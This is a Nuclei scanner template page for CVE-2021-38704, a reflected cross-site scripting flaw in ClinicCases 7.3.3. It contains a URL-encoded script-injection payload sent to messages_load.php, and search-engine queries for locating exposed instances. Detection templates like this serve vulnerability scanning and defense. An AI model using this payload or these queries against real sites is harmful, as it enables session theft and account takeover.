Skip to content
Nuclei Templates

ClinicCases 7.3.3 Cross-Site Scripting

ID: CVE-2021-38704

Severity: medium

Author: alph4byt3

Tags: cve,cve2021,xss,cliniccases

Description

Section titled “Description”

ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.

YAML Source

Section titled “YAML Source”
id: CVE-2021-38704


info:
  name: ClinicCases 7.3.3 Cross-Site Scripting
  author: alph4byt3
  severity: medium
  description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://github.com/sudonoodle/CVE-2021-38704
    - https://nvd.nist.gov/vuln/detail/CVE-2021-38704
    - https://github.com/judsonmitchell/ClinicCases/releases
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-38704
    cwe-id: CWE-79
    epss-score: 0.0015
    epss-percentile: 0.5117
    cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cliniccases
    product: cliniccases
    shodan-query:
      - http.title:"ClinicCases",html:"/cliniccases/"
      - http.title:"cliniccases",html:"/cliniccases/"
    fofa-query: title="cliniccases",html:"/cliniccases/"
    google-query: intitle:"cliniccases",html:"/cliniccases/"
  tags: cve,cve2021,xss,cliniccases


http:
  - method: GET
    path:
      - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"


      - type: word
        part: header
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 4a0a0047304502205a05dbdaa03f7e023f4abbf2c978dc2d491984e5219817bd16ca9ca56a3a9f4e02210083e3dd6bc2c5fb3b6aa2d92bdc4f453d299c5dca493f199d88af35231bc41249:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-38704.yaml"

View on Github